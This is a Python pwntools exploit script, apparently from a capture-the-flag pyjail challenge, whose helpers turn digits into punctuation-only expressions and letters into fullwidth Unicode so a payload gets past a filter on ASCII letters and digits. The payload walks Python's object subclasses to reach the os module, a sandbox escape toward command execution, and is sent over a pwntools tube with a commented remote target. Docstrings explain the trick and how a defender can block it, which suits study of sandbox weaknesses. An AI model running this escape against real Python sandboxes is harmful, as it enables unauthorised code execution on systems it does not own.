from pwn import *
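def send(p, pl: bytes, error_msg='No output received.', print_rcv=True):
    """Send one payload line over the tube and return what came back.

    Args:
        p: a pwntools tube (``process`` or ``remote``); only ``sendline`` and
            ``recv`` are used.
        pl: the payload bytes; ``sendline`` appends the newline.
        error_msg: text printed when the tube yields no output (EOF or a
            timeout with nothing buffered).
        print_rcv: when True, echo the received text to stdout.

    Returns:
        The decoded reply (possibly empty after a timeout), or None when the
        tube hit EOF before answering.
    """
    p.sendline(pl)
    try:
        # Keep the try body to the one call that can raise EOFError.
        raw = p.recv(timeout=0.5)
    except EOFError:
        # The far side closed the connection before replying.
        print(error_msg)
        return None
    # Undecodable bytes are replaced instead of raising, so a binary or
    # partially received reply still shows up instead of crashing the loop.
    received = raw.decode(errors="replace")
    if not received:
        # pwntools returns b'' when the timeout expires with no data buffered;
        # the original only reported error_msg on EOF and printed a blank line here.
        print(error_msg)
    elif print_rcv:
        print(received)
    return received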
# https://halb.it/posts/bluehens-pyjail/
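def craft_num(n):
    """Return a punctuation-only Python expression that evaluates to *n*.

    ``0`` is spelled ``-([]<[])`` and ``1`` is ``(-~([]<[]))``; larger values
    are ``n`` copies of the latter joined with ``+``.  The result grows
    linearly with *n*, so this is deliberately only practical for small
    numbers (the original author calls it "inefficient").

    Args:
        n: non-negative integer to encode.

    Returns:
        A string containing no letters or digits that evaluates to ``n``.

    Raises:
        ValueError: if *n* is negative.  The original returned ``""`` for
            negative input, which would silently produce a broken expression.
    """
    # []<[] is False, i.e. 0; -~0 is 1.  Neither spelling needs a digit or a letter.
    zero = "-([]<[])"
    one = "(-~([]<[]))"
    if n < 0:
        raise ValueError(f"n must be non-negative, got {n}")
    if n == 0:
        return zero
    return "+".join([one] * n)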
def denormalize(str):
    """Rewrite lower-case ASCII letters and most underscores as fullwidth forms.

    ``a``..``z`` become U+FF41..U+FF5A and ``_`` becomes U+FF3F unless the
    underscore directly follows ``.``, ``[``, ``(`` or a space.  Digits,
    punctuation and upper-case letters pass through unchanged.  Python
    NFKC-normalises identifiers (PEP 3131), so the rewritten text still names
    the same attributes -- which is why a sandbox filter that only matches
    ASCII letters does not stop it; a defender should normalise (or reject)
    non-ASCII identifiers before applying such a filter.

    Note: the parameter keeps its original name ``str``, so the builtin of
    that name is shadowed inside this function.
    """
    fullwidth_a = 0xFF41  # https://www.compart.com/en/unicode/U+FF41
    ascii_a = ord("a")

    def widen(ch):
        # Only lower-case ASCII letters are shifted into the fullwidth block.
        if "a" <= ch <= "z":
            return chr(fullwidth_a + (ord(ch) - ascii_a))
        return ch

    widened = "".join(map(widen, str))
    # An underscore that opens an identifier (after '.', '[', '(' or a space)
    # is kept; every other underscore becomes U+FF3F (fullwidth low line,
    # https://www.compart.com/en/unicode/U+FF3F).
    # NOTE(review): an underscore at the very start of the text is replaced
    # as well, since nothing precedes it; the payload in main() never starts
    # with one.
    not_after_opener = re.compile(r"(?<![\.\[\( ])_")
    return not_after_opener.sub(chr(0xFF3F), widened)
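def main():
    """Send one filter-evading payload to the target and print the reply.

    A local ``/bin/sh`` stands in for the real target here; the commented
    ``remote(...)`` line shows the shape of the real connection.  The payload
    is the ``catch_warnings`` subclass walk from the original script, passed
    through ``denormalize`` (letters) and ``craft_num`` (digits) so that it
    contains no ASCII letters or digits.  It illustrates why a sandbox that
    only blacklists those character classes is not a security boundary.

    NOTE(review): ``im_func`` / ``func_globals`` are Python 2 attribute names,
    so the original target is presumably a Python 2 interpreter.
    """
    # p = remote('host', 443, ssl=True)
    # The tube is used as a context manager so the child process is closed
    # even if send() raises (the original never closed it).
    with process("/bin/sh") as p:
        # Plain form of the same payload, kept for reference:
        # pl = b'[x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "catch_warnings"][0].__repr__.im_func.func_globals["linecache"].os'
        # If letters and numbers are filtered:
        #   use denormalize() for letters
        #   use craft_num() for numbers
        pl = denormalize(f'[x for x in ().__class__.__base__.__subclasses__() if x.__name__ == "catch_warnings"][{craft_num(0)}].__repr__.im_func.func_globals["linecache"].os').encode()
        send(p, pl)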
if __name__ == "__main__":
    # Run only when executed as a script, not when imported for its helpers.
    main()